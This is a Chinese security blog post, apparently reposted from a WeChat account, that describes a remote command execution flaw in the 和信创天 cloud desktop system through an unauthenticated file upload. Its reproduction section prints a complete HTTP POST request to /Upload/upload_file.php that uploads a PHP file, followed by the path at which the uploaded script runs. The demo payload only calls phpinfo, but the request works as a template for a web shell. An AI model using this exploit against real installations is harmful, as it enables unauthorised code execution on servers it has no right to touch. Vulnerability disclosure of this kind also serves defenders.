和信创天云桌面系统远程命令执行

  • A+
所属分类:安全漏洞
欢迎关注公众号:进德修业行道。一名普通的白帽子,维护着一个既讲技术又有温度的原创号,一如既往地学习和分享,希望大家在紧张而忙碌的生活中可以在这里安静的学习,前行的道路上感谢有您的关注与支持。
漏洞描述
和信创天云桌面系统存在默认配置导致文件上传并可以远程命令执行
漏洞影响
和信创天云桌面系统
漏洞复现
访问漏洞url:
登录页面如下
和信创天云桌面系统远程命令执行
构造payload
POST /Upload/upload_file.php?l=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,fil;q=0.8Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGvContent-Length: 180
------WebKitFormBoundaryfcKRltGvContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/avif
<?php phpinfo(); ?>------WebKitFormBoundaryfcKRltGv--
漏洞利用
和信创天云桌面系统远程命令执行
访问
https://xxx.xxx.xxx/Upload/1/1.php
漏洞证明
和信创天云桌面系统远程命令执行
漏洞利用poc
和信创天云桌面系统远程命令执行
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:进德修业行道 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

本文始发于微信公众号(进德修业行道):和信创天云桌面系统远程命令执行

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: